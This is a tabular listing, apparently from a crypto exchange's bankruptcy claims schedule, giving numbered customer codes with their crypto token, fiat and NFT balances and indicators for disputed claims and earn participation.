| 07325440 | | USD[10.00] | | |
| 07325442 | | CUSDT[1], DOGE[1.00089773], TRX[0.26874156], USD[0.00] | Yes | |
| 07325444 | | DOGE[94.57054864], USD[0.00] | | |
| 07325445 | | USD[0.22] | | |
| 07325446 | | USD[10.00] | | |
| 07325447 | | BAT[1], BRZ[2], CUSDT[4], DOGE[1], TRX[2], USD[0.00] | | |
| 07325448 | | DOGE[1], USD[0.00] | | |
| 07325450 | | USD[10.00] | | |
| 07325452 | | USD[10.00] | | |
| 07325454 | | USD[10.00] | | |
| 07325456 | | BRZ[0], CUSDT[1], DOGE[230.70147236], USD[0.00] | | |
| 07325457 | | USD[10.00] | | |
| 07325458 | | DOGE[107.48265332], SHIB[1176143.77496697], USD[0.00] | Yes | |
| 07325459 | | BTC[0.00025494], ETH[.00032112], ETHW[.00032112], GRT[.008], USD[1.11] | | |
| 07325460 | | DOGE[30.16096617], USD[0.00] | | |
| 07325461 | | USD[10.00] | | |
| 07325463 | | BRZ[2], CUSDT[1], DOGE[5366.74625991], TRX[3], USD[-30.41] | | |
| 07325464 | | CUSDT[1], DOGE[.00017498], TRX[1], USD[0.01] | | |
| 07325465 | | USD[10.00] | | |
| 07325466 | | BRZ[1], USD[12.00] | | |
| 07325467 | | USD[10.00] | | |
| 07325469 | | USD[10.00] | | |
| 07325470 | | DOGE[19592.032], USD[0.50] | | |
| 07325471 | | BRZ[5.07952967], CUSDT[16], DOGE[16.25892051], GRT[7.42624665], SHIB[1], TRX[15.41382817], UNI[1.08328662], USD[1445.06], USDT[1.0987398] | Yes | |
| 07325472 | | BTC[0], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07325473 | | USD[10.00] | | |
| 07325474 | | CUSDT[3], DOGE[1], ETH[1.01226818], ETHW[1.01226818], TRX[2], USD[0.00] | | |
| 07325475 | | USD[9.10] | | |
| 07325476 | | BRZ[3], CUSDT[11], LTC[0], TRX[3], USD[0.01] | | |
| 07325477 | | USD[20.00] | | |
| 07325478 | | USD[10.00] | | |
| 07325479 | | DOGE[86.50523521], USD[0.00] | | |
| 07325480 | | CUSDT[1], DOGE[46.48644706], TRX[1], USD[0.00] | | |
| 07325481 | | CUSDT[2], DOGE[22339.56165427], SOL[.52385863], USD[0.00] | | |
| 07325482 | | USD[0.00] | | |
| 07325483 | | USD[0.00], USDT[0] | | |
| 07325484 | | SGD[11.80], TRX[1], USD[0.81] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325485 | Contingent, Disputed | BTC[0], DOGE[0], ETH[0], NFT (296500791252509900/Barcelona Ticket Stub #1121)[1], NFT (398789943424732099/FTX - Off The Grid Miami #2357)[1], NFT (483956623943880910/You in, Miami?)[1], NFT (516824782864857935/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #54)[1], NFT (525725110790403262/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #33)[1], SUSHI[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07325487 | | DOGE[152.44765404], USD[0.00] | | |
| 07325488 | | DOGE[1], USD[0.00] | | |
| 07325489 | | USD[10.00] | | |
| 07325490 | | USD[10.00] | | |
| 07325491 | | USD[10.00] | | |
| 07325492 | | USD[10.00] | | |
| 07325494 | | BRZ[1], CUSDT[1], TRX[1], USD[0.05] | Yes | |
| 07325495 | | USD[10.00] | | |
| 07325496 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07325497 | | BTC[.00004162], DOGE[85.37455], USD[3.23] | | |
| 07325498 | | USD[10.00] | | |
| 07325500 | | BTC[.00034222], CUSDT[1], DOGE[632.8033965], USD[0.00] | | |
| 07325501 | | BAT[0.27906634], BRZ[0], DOGE[0], ETH[0], UNI[0], USD[0.00], USDT[0] | | |
| 07325502 | | DOGE[139.94752989], TRX[15.69682671], USD[0.00] | | |
| 07325503 | | BCH[0], BTC[0], CUSDT[1], DOGE[2], ETH[0], ETHW[0], GRT[0], LTC[0], MATIC[0], SOL[0], UNI[0], USD[0.00], USDT[0.00000193] | | |
| 07325505 | | USD[10.00] | | |
| 07325506 | | BRZ[1], CUSDT[3], DOGE[2818.17321594], NFT (510318462645874022/Geometry of Protection #3)[1], TRX[319.89968119], USD[0.01] | Yes | |
| 07325509 | | BTC[.00136777], CUSDT[2], USD[0.00] | | |
| 07325510 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07325511 | | DOGE[1], USD[30.52] | | |
| 07325512 | | CUSDT[2], DOGE[.00000365], USD[0.00] | | |
| 07325514 | | USD[10.00] | | |
| 07325515 | | USD[10.91] | Yes | |
| 07325516 | | DOGE[1017.36046737], ETH[.00605977], ETHW[.00605977], USD[1.00] | | |
| 07325517 | | USD[10.00] | | |
| 07325518 | | USD[0.00] | | |
| 07325519 | | USD[10.00] | | |
| 07325520 | | SHIB[1], USD[91.20] | | |
| 07325521 | | CUSDT[5], TRX[.00000387], USD[0.01] | | |
| 07325522 | | USD[10.00] | | |
| 07325523 | | USD[10.00] | | |
| 07325524 | | USD[10.00] | | |
| 07325525 | | CUSDT[2], DOGE[48.86057881], USD[0.02] | | |
| 07325526 | | BTC[.02868889], CUSDT[45.00246581], DOGE[8713.75806744], ETH[.14684338], ETHW[.14596331], SOL[.06043006], TRX[8.00087675], USD[15.94] | Yes | |
| 07325527 | | CUSDT[1], DOGE[3], USD[0.00], USDT[1] | | |
| 07325529 | | USD[8.24], USDT[0] | | |
| 07325531 | | USD[10.00] | | |
| 07325532 | | UNI[.49241223], USD[0.00] | | |
| 07325533 | | DAI[0], SHIB[1], SUSHI[0], USD[0.01], USDT[0] | Yes | |
| 07325534 | | CUSDT[11], DOGE[9541.43044337], ETH[.1141909], ETHW[.11307334], SHIB[5102139.85697432], TRX[2131.04776376], USD[0.00] | Yes | |
| 07325535 | | BRZ[3], CUSDT[3], DOGE[4], TRX[6], USD[0.01] | | |
| 07325536 | | CUSDT[4], DOGE[81.62503482], LINK[.78209006], TRX[2], USD[0.00] | | |
| 07325537 | | USD[10.00] | | |
| 07325538 | | BTC[0], CUSDT[3], GRT[1], TRX[1], USD[0.01] | | |
| 07325539 | | USD[10.00] | | |
| 07325540 | | USD[10.00] | | |
| 07325541 | | BRZ[1], CUSDT[2], DOGE[2703.86097967], TRX[1], USD[0.00] | Yes | |
| 07325542 | | USD[10.00] | | |
| 07325543 | | DOGE[.00612424], ETH[0], LTC[.00004099], USD[0.00], USDT[0.00001985] | Yes | |
| 07325544 | | DOGE[3753.116], USD[1097.09] | | |
| 07325546 | | LTC[0], SHIB[3], USD[0.01], USDT[0.00000745] | | |
| 07325547 | | BAT[0], BRZ[1], BTC[0], CUSDT[9], DOGE[0], ETH[0], LTC[.10789775], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07325548 | | CUSDT[2], USD[0.00] | | |
| 07325549 | | USD[10.00] | | |
| 07325550 | | CUSDT[1], DOGE[1390.78613846], TRX[1], USD[-50.00] | Yes | |
| 07325551 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325552 | | USD[10.00] | | |
| 07325553 | | NFT (374450904194931048/Coachella x FTX Weekend 2 #31029)[1], USD[10.00] | | |
| 07325554 | | NFT (511202735249608051/Romeo #553)[1], NFT (566560472845952820/Romeo #541)[1], USD[0.00] | Yes | |
| 07325556 | | DOGE[.23770128], SHIB[1], USD[27.33] | | |
| 07325558 | | USD[0.01], USDT[0] | | |
| 07325561 | | USD[10.00] | | |
| 07325562 | | BTC[0.00277285], GRT[104.795], LINK[4.4955], SOL[.188], TRX[3121.875], USD[305.72] | | |
| 07325563 | | CUSDT[1], DOGE[1258.43169595], USD[0.00] | | |
| 07325564 | | BAT[326.90351174], CUSDT[1], DOGE[35709.64982458], TRX[1], USD[10.00] | | |
| 07325565 | | USD[10.00] | | |
| 07325566 | | USD[10.81] | Yes | |
| 07325567 | | USD[10.00] | | |
| 07325568 | | CUSDT[1], DOGE[155.59682847], TRX[1], USD[0.48] | | |
| 07325570 | | TRX[1], USD[0.68] | | |
| 07325571 | | USD[0.00] | | |
| 07325572 | | BRZ[1], BTC[0], CUSDT[1], DOGE[1], LTC[0], PAXG[0], TRX[4], USD[0.00], USDT[0] | | |
| 07325573 | | BRZ[1], BTC[.00186829], CUSDT[12], TRX[4], USD[0.00] | Yes | |
| 07325574 | | USD[10.00] | | |
| 07325575 | | USD[10.00] | | |
| 07325576 | | DOGE[1.00004372], USD[31.53] | | |
| 07325577 | | USD[10.00] | | |
| 07325578 | | DOGE[677.176287], USD[0.00] | | |
| 07325579 | | BCH[.00000038], BRZ[.00559546], CUSDT[.00310183], ETHW[2.8436002], SHIB[6], TRX[.00156063], USD[124.32] | Yes | |
| 07325580 | | USD[10.00] | | |
| 07325581 | | USD[10.00] | | |
| 07325582 | | BRZ[0.00153609], BTC[0], CUSDT[1], DOGE[0], TRX[.000003], USD[0.00], USDT[0] | | |
| 07325584 | | USD[10.00] | | |
| 07325587 | | USD[10.00] | | |
| 07325588 | | USD[10.00] | | |
| 07325589 | | CUSDT[6], DOGE[1.63285382], GRT[.07094731], SUSHI[.00009062], TRX[3.85568851], USD[0.00] | | |
| 07325590 | | SOL[0], SUSHI[0], USD[0.00] | | |
| 07325591 | | BRZ[1], CUSDT[9], DOGE[1], ETH[0], SHIB[4], SOL[0.17830228], TRX[0], USD[0.00] | | |
| 07325593 | | DOGE[236.10009155], USD[10.00] | | |
| 07325594 | | USD[10.00] | | |
| 07325595 | | BRZ[4], CUSDT[7], DOGE[8.10517639], SHIB[2], SOL[4.24010032], TRX[2], USD[698.81], USDT[2.14559535] | | |
| 07325596 | | CUSDT[2], DOGE[292.02673778], USD[0.00] | | |
| 07325597 | | DOGE[1.0072526], GRT[4.94017660], USD[0.00] | Yes | |
| 07325598 | | BRZ[0], BTC[0], DOGE[1.06579806], ETH[0], USD[0.00] | | |
| 07325599 | | USD[10.00] | | |
| 07325600 | | USD[10.00] | | |
| 07325601 | | USD[10.00] | | |
| 07325603 | | USD[20.00] | | |
| 07325605 | | USD[10.00] | | |
| 07325607 | | USD[10.00] | | |
| 07325608 | | USD[0.31] | Yes | |
| 07325609 | | DOGE[.10056277], USD[0.00] | | |
| 07325610 | | CUSDT[1], DOGE[3636.44675108], SOL[.35870493], TRX[223.5859026], USD[0.00] | Yes | |
| 07325611 | | BRZ[2], BTC[0], CUSDT[6], DOGE[1.57055561], GRT[1.00367791], SOL[0], TRX[3], USD[0.00] | Yes | |
| 07325612 | | SOL[3.984], USD[2.84] | | |
| 07325613 | | DAI[0], ETH[5.60292062], SOL[0], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07325614 | | USD[10.00] | | |
| 07325616 | | USD[10.00] | | |
| 07325618 | | UNI[.47753992], USD[0.00] | | |
| 07325619 | | BTC[0], DOGE[0], USD[1.48] | | |
| 07325620 | | USD[10.00] | | |
| 07325621 | | USD[10.00] | | |
| 07325622 | | BAT[0], ETH[0], ETHW[0], GRT[0], LTC[0], SUSHI[0], USD[0.00] | | |
| 07325623 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325624 | | BF_POINT[300], NFT (457906772505951547/Humpty Dumpty #70)[1] | Yes | |
| 07325625 | | USD[0.00] | | |
| 07325626 | | DOGE[0.03526910], USD[0.00] | | |
| 07325627 | | USD[10.00] | | |
| 07325628 | | BRZ[1], BTC[.00014536], CUSDT[4], USD[0.00] | | |
| 07325629 | | BTC[.00278936], DOGE[100.61025], ETH[.0358632], ETHW[.0358632], USD[0.12] | | |
| 07325630 | | BTC[0], DOGE[0], USD[0.11] | | |
| 07325631 | | USD[10.00] | | |
| 07325632 | | USD[10.00] | | |
| 07325634 | | BTC[0], DOGE[0], ETH[0], ETHW[0], SHIB[129399.58592132], USD[0.01] | | |
| 07325635 | | GRT[10.68711074], USD[0.01] | Yes | |
| 07325636 | | CUSDT[4], DOGE[12209.63205663], GRT[1], TRX[2], USD[0.00] | | |
| 07325637 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07325638 | | USD[10.00] | | |
| 07325640 | | CUSDT[5], DOGE[44.40178786], ETH[0.39137196], ETHW[0.39137196], LTC[.20109963], TRX[1], USD[0.00] | | |
| 07325641 | | USD[10.00] | | |
| 07325642 | | CUSDT[4], USD[0.01] | | |
| 07325643 | | USD[0.00] | | |
| 07325644 | | BTC[.00524942], DOGE[0.26128405], ETH[.15834178], ETHW[.15834178], GRT[21.978], USD[0.00] | | |
| 07325645 | | USD[10.00] | | |
| 07325646 | | CUSDT[4], DOGE[1], ETH[0], TRX[1], USD[0.00] | | |
| 07325648 | | CUSDT[4], DOGE[675.40049009], TRX[41.81267128], USD[0.00] | | |
| 07325649 | | BRZ[0], BTC[0], DOGE[1], ETH[0], GRT[0], LINK[0], SHIB[4], SOL[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07325650 | | CUSDT[2], DOGE[50.52604335], USD[0.00] | | |
| 07325651 | | USD[10.00] | | |
| 07325652 | | BTC[0], GRT[0], LTC[0], SHIB[3], TRX[2], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07325653 | | DOGE[24.65062018], TRX[45.69019053], USD[0.02] | | |
| 07325654 | | BRZ[1], USD[0.00] | Yes | |
| 07325655 | | DOGE[.00000982], MATIC[.47394623], USD[0.00] | | |
| 07325657 | | USD[10.00] | | |
| 07325658 | | BAT[53.82315413], BTC[.00513011], CUSDT[1855.95554091], DOGE[19537.40402725], ETHW[.01182681], GRT[29.94694463], MATIC[8.07425296], SHIB[1], SOL[13.51098917], TRX[3056.27654023], USD[0.01], USDT[0] | Yes | |
| 07325659 | | CUSDT[2], DOGE[133.18253346], USD[0.00] | | |
| 07325660 | | USD[10.00] | | |
| 07325661 | | USD[10.00] | | |
| 07325662 | | DOGE[157.99101578], USD[0.00] | | |
| 07325663 | | TRX[1], USD[0.01], USDT[0] | | |
| 07325664 | | USD[10.00] | | |
| 07325665 | | BTC[.00991421], CUSDT[4], ETH[.08308595], ETHW[.08308595], USD[0.00], USDT[1] | | |
| 07325666 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07325667 | | BTC[.00000003], DOGE[.0475259], USD[0.00] | Yes | |
| 07325668 | | BTC[0], DOGE[0], ETH[0], USD[0.01] | | |
| 07325669 | | BTC[0], DOGE[18.97084196], ETH[0], GRT[0], USD[0.00] | Yes | |
| 07325670 | | USD[10.00] | | |
| 07325672 | | CUSDT[2], DOGE[9804.58289735], LINK[21.7553593], USD[10.00] | | |
| 07325673 | | USD[10.00] | | |
| 07325674 | | CUSDT[2], DOGE[1], TRX[2], USD[0.19], USDT[1] | | |
| 07325675 | | ETH[.00307687], ETHW[.00307687], GRT[9.87906122], TRX[1], USD[0.00] | | |
| 07325676 | | USD[10.00] | | |
| 07325677 | | ETH[0], USD[0.00] | | |
| 07325678 | | BTC[.0000705], DOGE[277.72812181], SUSHI[.19051066], USD[13.02] | | |
| 07325679 | | BTC[0], DOGE[0] | | |
| 07325680 | | USD[10.96] | Yes | |
| 07325681 | | USD[10.00] | | |
| 07325682 | | DOGE[1664.62275], USD[0.15] | | |
| 07325683 | | USD[10.00] | | |
| 07325684 | | USD[10.00] | | |
| 07325686 | | USD[10.00] | | |
| 07325687 | | DOGE[429.91406902], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325689 | | USD[0.00] | | |
| 07325690 | | USD[10.00] | | |
| 07325691 | | DOGE[196.58318761], USD[0.00] | | |
| 07325692 | | USD[10.00] | | |
| 07325693 | | DOGE[238.54984139], USD[0.00] | | |
| 07325694 | | DOGE[1], ETH[.01257475], ETHW[.01257475], USD[0.00] | | |
| 07325695 | | USD[0.00] | | |
| 07325696 | | TRX[152.88974615], USD[0.00] | | |
| 07325698 | | BRZ[5.07952967], CUSDT[19], DOGE[2], GRT[.00592606], KSHIB[1439.08331544], SHIB[1559484.52743994], SUSHI[113.47874326], TRX[6], USD[0.00], USDT[1.10623063] | Yes | |
| 07325699 | | CUSDT[4], DOGE[24.5129121], USD[0.00] | Yes | |
| 07325700 | | USD[0.00] | Yes | |
| 07325701 | | USD[10.00] | | |
| 07325702 | | USD[10.00] | | |
| 07325704 | | BRZ[1], DOGE[.00002253], ETH[0], TRX[1], USD[0.00] | | |
| 07325705 | | CUSDT[1], DOGE[274.55639551], TRX[1], USD[0.00] | | |
| 07325706 | | USD[20.00] | | |
| 07325707 | | DOGE[0] | | |
| 07325708 | | USD[10.00] | | |
| 07325709 | | USD[10.00] | | |
| 07325710 | | USD[10.00] | | |
| 07325711 | | BTC[.00018524], USD[0.00] | Yes | |
| 07325712 | | DOGE[39.49637376], USD[0.00] | Yes | |
| 07325713 | | USD[10.98] | Yes | |
| 07325714 | | USD[10.00] | | |
| 07325716 | | CUSDT[1], USD[0.00] | | |
| 07325717 | | USD[10.00] | | |
| 07325718 | | USD[10.00] | | |
| 07325721 | | USD[10.00] | | |
| 07325722 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07325723 | | USD[0.00] | Yes | |
| 07325724 | | DOGE[.00137992], ETHW[1.03142305], USD[0.00] | Yes | |
| 07325726 | | BTC[.00022513], SHIB[1], USD[0.00] | Yes | |
| 07325727 | | USD[0.00] | | |
| 07325728 | | CUSDT[1], DOGE[2], GRT[19.45939962], USD[0.00], USDT[0.00000001] | | |
| 07325729 | | BTC[.0051792], DOGE[6180.82714637], ETH[.037848], ETHW[.037848], USD[0.00] | | |
| 07325731 | | BTC[.00008712], CUSDT[52.17573108], DOGE[125.73057574], KSHIB[87.53849286], TRX[176.60071811], USD[0.00] | Yes | |
| 07325732 | | ETH[.00430492], ETHW[.0042502], SOL[.00198264], USD[0.00] | Yes | |
| 07325733 | | CUSDT[3], DOGE[128.82895308], USD[0.48] | | |
| 07325734 | | USD[10.00] | | |
| 07325735 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], LINK[0], LTC[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[0.01], USDT[2.16398285], YFI[0] | Yes | |
| 07325736 | | USD[35.00] | | |
| 07325737 | | ETH[.00000001], USD[0.00] | Yes | |
| 07325738 | | BRZ[1], DOGE[0], ETH[0], TRX[1], USD[10.98] | Yes | |
| 07325739 | | BRZ[1], CUSDT[3], DOGE[3841.98127987], TRX[212.32705857], USD[0.00] | | |
| 07325740 | | USD[10.00] | | |
| 07325741 | | USD[0.00] | | |
| 07325742 | | DOGE[1296.67522957], USD[10.00] | | |
| 07325743 | | DOGE[1068.04811659], USD[0.00] | | |
| 07325745 | | DOGE[0], SUSHI[0], USDT[0.00000001] | | |
| 07325746 | | USD[0.00] | Yes | |
| 07325747 | | USD[10.00] | | |
| 07325748 | | SOL[0], TRX[1], USD[0.02] | | |
| 07325749 | | DOGE[0.92060946], USD[0.70], USDT[1.08101365] | Yes | |
| 07325750 | | USD[10.00] | | |
| 07325751 | | USD[10.00] | | |
| 07325752 | | BTC[.00018215], USD[0.00] | | |
| 07325753 | | SHIB[4], USD[0.01] | | |
| 07325754 | | BRZ[3], CUSDT[8], DOGE[1], SHIB[3], TRX[.06183893], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325755 | | BTC[.00205834], CUSDT[2], DOGE[1911.90370821], ETH[.02566564], ETHW[.02562378], GRT[16.28710723], SHIB[1], TRX[1], USD[25.04] | Yes | |
| 07325756 | | USD[10.00] | | |
| 07325757 | | USD[10.00] | | |
| 07325758 | | ETH[.00000001], SOL[0], USD[0.00], USDT[0.00000078] | Yes | |
| 07325759 | | BRZ[0], DOGE[0], USD[0.00] | | |
| 07325760 | | CUSDT[3], DOGE[1], TRX[4], USD[0.01] | | |
| 07325761 | | DOGE[35.81663045], USD[0.00] | | |
| 07325762 | | CUSDT[1], TRX[100.00002403], USD[0.01] | | |
| 07325763 | | DOGE[120.756], USD[1.90] | | |
| 07325764 | | CUSDT[2], USD[0.00] | | |
| 07325765 | | BTC[.00122891], CUSDT[5], GRT[1], KSHIB[262.24530287], SHIB[2], TRX[2], USD[40.17] | | |
| 07325766 | | BCH[0.00000029], CUSDT[0], DOGE[0], GRT[.00083623], USD[0.01] | Yes | |
| 07325767 | | USD[10.00] | | |
| 07325768 | | BRZ[1], CUSDT[2], TRX[2], USD[0.01] | | |
| 07325769 | | USD[0.00] | | |
| 07325771 | | USD[10.00] | | |
| 07325772 | | USD[10.00] | | |
| 07325773 | | SOL[.59496832], USD[0.54] | Yes | |
| 07325774 | | CUSDT[2], DOGE[1], LTC[.00369838], TRX[1], USD[374.77] | | |
| 07325777 | | GRT[6.24276463], USD[0.00] | | |
| 07325778 | | BRZ[2], CUSDT[6], DOGE[.00034957], GRT[1], TRX[3], USD[0.03] | | |
| 07325779 | | TRX[1], USD[0.00] | | |
| 07325780 | | USD[10.00] | | |
| 07325784 | | BTC[.00000191], USD[0.00] | Yes | |
| 07325785 | | ETH[0.05454286], ETHW[0.05454286], USD[54.92] | | |
| 07325788 | | BTC[.00000205], USD[0.00] | Yes | |
| 07325789 | | BTC[0], DOGE[3], LTC[0], USD[0.00] | | |
| 07325790 | | CAD[0.00], USD[0.00] | | |
| 07325791 | | USD[0.00] | | |
| 07325792 | | CUSDT[1], DOGE[.00001818], USD[0.00] | | |
| 07325793 | | USD[10.00] | | |
| 07325795 | | BAT[1.0165555], BF_POINT[100], BRZ[3], BTC[.00003448], CUSDT[2585.56164827], DOGE[1180.79418178], ETH[.04612753], ETHW[.04555297], TRX[380.49630184], USD[-105.66] | Yes | |
| 07325796 | | BRZ[1], DOGE[3.09498044], USD[0.00] | | |
| 07325797 | | USD[10.00] | | |
| 07325798 | | CUSDT[1], MATIC[24.21367264], USD[0.00] | Yes | |
| 07325799 | | AVAX[.00046132], BRZ[1], BTC[0], DOGE[3], ETH[.00015101], ETHW[.00015101], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07325800 | | USD[10.00] | | |
| 07325801 | | USD[10.00] | | |
| 07325802 | | USD[0.00] | | |
| 07325803 | | BRZ[1], CUSDT[3], DOGE[.00000002], USD[0.01] | | |
| 07325804 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07325805 | | USD[10.00] | | |
| 07325806 | | DOGE[0], USD[0.00] | | |
| 07325808 | | DOGE[1.00414554], USD[0.00], USDT[0] | | |
| 07325810 | | USD[10.00] | | |
| 07325811 | | BTC[.0000047], USD[0.00] | Yes | |
| 07325812 | | BRZ[1], CUSDT[2], TRX[2], USD[0.01] | | |
| 07325813 | | CUSDT[1], DOGE[0.71062983], ETH[0], ETHW[0], SOL[0], USD[0.00] | Yes | |
| 07325814 | | BRZ[2], CUSDT[14], DOGE[7.05977926], ETH[.00000082], ETHW[.00000082], SHIB[3313497.15455458], TRX[12.01480362], USD[0.00], USDT[1.06888024] | Yes | |
| 07325815 | | TRX[214.25805969], USD[0.00] | | |
| 07325816 | | USD[10.00] | | |
| 07325817 | | CUSDT[4], DOGE[1], USD[0.21] | Yes | |
| 07325818 | | USD[10.99] | Yes | |
| 07325819 | | DOGE[1051.21015716], USD[0.00] | | |
| 07325820 | | USD[10.00] | | |
| 07325821 | | DOGE[1], USD[0.01], USDT[0] | | |
| 07325822 | | CUSDT[1], DOGE[1.54535818], TRX[1], USD[0.00] | | |
| 07325823 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325825 | | BRZ[1], CUSDT[2], DOGE[1], ETH[.75572065], ETHW[.75572065], LTC[2.00834734], TRX[4], UNI[23.83374802], USD[425.44] | | |
| 07325826 | | SHIB[127847.17460605], USD[0.00] | Yes | |
| 07325830 | | DOGE[608.24850993], USD[0.01], USDT[0] | Yes | |
| 07325831 | | USD[10.00] | | |
| 07325832 | | BTC[.00039459], DOGE[205.61716807], SHIB[499500], USD[36.41] | | |
| 07325833 | | BTC[0.00106731], CUSDT[2], DOGE[0], ETH[0.01667741], ETHW[0.01667741], LTC[0], USD[0.00], USDT[2.84236237] | | |
| 07325834 | | USD[10.00] | | |
| 07325836 | | BRZ[1], CUSDT[2], USD[0.93] | | |
| 07325837 | | USD[10.00] | | |
| 07325838 | | USD[10.00] | | |
| 07325839 | | BAT[151.12275838], BRZ[1], CUSDT[1], DOGE[1], GRT[2], KSHIB[1694.2355499], SHIB[1686627.06324843], SOL[85.3243859], USD[0.00] | | |
| 07325840 | | CUSDT[6], DOGE[20.91824517], TRX[3], USD[0.41] | | |
| 07325841 | | SUSHI[.70926208], USD[0.00] | | |
| 07325842 | | AVAX[0.50029119], BRZ[1], BTC[0.00472738], CUSDT[1], DOGE[9.37272028], ETH[0.03836247], ETHW[0.03788367], MATIC[9.95865923], SHIB[158034.44886231], SOL[0], SUSHI[0.86867897], UNI.350140361, USD[0.00] | Yes | |
| 07325843 | | BRZ[2], TRX[1], USD[0.00] | | |
| 07325844 | | USD[0.01] | | |
| 07325845 | | DOGE[1], ETH[.0036997], ETHW[.0036997], USD[24.32] | | |
| 07325846 | | CUSDT[1], TRX[2], USD[0.01] | Yes | |
| 07325847 | | DOGE[1], USD[0.01] | | |
| 07325848 | | DOGE[.00000056], USD[0.00] | | |
| 07325850 | | USD[10.00] | | |
| 07325851 | | USD[10.00] | | |
| 07325853 | | DOGE[0], USD[0.00] | | |
| 07325855 | | USD[10.00] | | |
| 07325856 | | BTC[.00242576], CUSDT[11], DOGE[356.11687238], ETH[.03320877], ETHW[.03279837], LTC[.40534318], TRX[211.33288077], UNI[.40433292], USD[0.00] | Yes | |
| 07325858 | | BRZ[1], CUSDT[5603.89615909], DOGE[3.00001662], TRX[1], USD[0.00] | Yes | |
| 07325859 | | BTC[0], USD[0.00] | | |
| 07325860 | | USD[0.00], USDT[0] | | |
| 07325862 | | USD[10.00] | | |
| 07325864 | | BCH[.00006701], BRZ[1], CUSDT[3], DOGE[955.07045243], TRX[4], USD[0.00] | | |
| 07325865 | | ALGO[28.48966648], BCH[.01361981], BTC[.00021263], CUSDT[466.0744414], DOGE[1202.17913644], GRT[51.20106694], LINK[.99509642], SOL[1.47655417], TRX[885.83038015], USD[0.00], USDT[9.94606151] | | |
| 07325866 | | BRZ[1], BTC[0], CUSDT[11], DOGE[0], ETH[0.00000001], TRX[0], USD[0.00] | | |
| 07325867 | | BRZ[2], CUSDT[3], DOGE[2], TRX[2], USD[0.01] | | |
| 07325869 | | DOGE[1], USD[0.00] | | |
| 07325870 | | DOGE[28.78887091], USD[0.00] | | |
| 07325871 | | USD[0.01] | | |
| 07325873 | | DOGE[.0000427], USD[10.00] | | |
| 07325876 | | DOGE[2222.51824777], USD[10.00] | | |
| 07325878 | | GRT[0], USD[0.05] | | |
| 07325880 | | MATIC[7.07343246], USD[0.00] | | |
| 07325881 | | CUSDT[1], USD[0.00] | | |
| 07325882 | | BTC[.00000547] | | |
| 07325883 | | USD[0.00] | | |
| 07325884 | | BTC[0], ETH[0], LTC[0], NFT (438422724111364109/Juliet #475)[1], NFT (500362678163968547/Humpty Dumpty #1036)[1], USD[0.00], USDT[985.99483309] | | |
| 07325886 | | USD[10.00] | | |
| 07325887 | | DOGE[36.40889814], EUR[2.43], USD[4.00] | | |
| 07325888 | | USD[10.00] | | |
| 07325889 | | USD[10.00] | | |
| 07325890 | | TRX[4], USD[0.00] | | |
| 07325894 | | USD[10.00] | | |
| 07325898 | | USD[0.04], USDT[.004053] | | |
| 07325899 | | USD[0.00] | | |
| 07325901 | | USD[10.00] | | |
| 07325903 | | BCH[0], BRZ[0], BTC[0], CUSDT[8], DOGE[404.60127747], ETH[0], LINK[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07325906 | | USD[10.00] | | |
| 07325907 | | USD[10.00] | | |
| 07325908 | | ETH[.00003338], ETHW[.00003338], LTC[0], USD[0.00] | | |
| 07325909 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325911 | | USD[20.00] | | |
| 07325912 | | USD[0.20] | | |
| 07325914 | | CUSDT[2], USD[0.00] | | |
| 07325915 | | BRZ[1], BTC[.00098664], CUSDT[6], DOGE[15.24948136], GRT[70.56182957], MATIC[22.02260137], SOL[.06346153], SUSHI[9.78725709], TRX[5], UNI[1.58539457], USD[0.01] | Yes | |
| 07325916 | | USD[10.00] | | |
| 07325917 | | TRX[193.47774899], USD[0.00] | | |
| 07325918 | | BRZ[.75], CUSDT[1], GRT[1], TRX[1], USD[0.98] | | |
| 07325919 | | BAT[1], CUSDT[2], DOGE[1], TRX[1], USD[0.00], USDT[1] | | |
| 07325920 | | USD[10.00] | | |
| 07325922 | | CUSDT[1], USD[28.86] | | |
| 07325923 | | USD[10.00] | | |
| 07325925 | | USD[10.00] | | |
| 07325926 | | DOGE[5611.48974654], TRX[1], USD[110.00] | | |
| 07325928 | | USD[0.00] | Yes | |
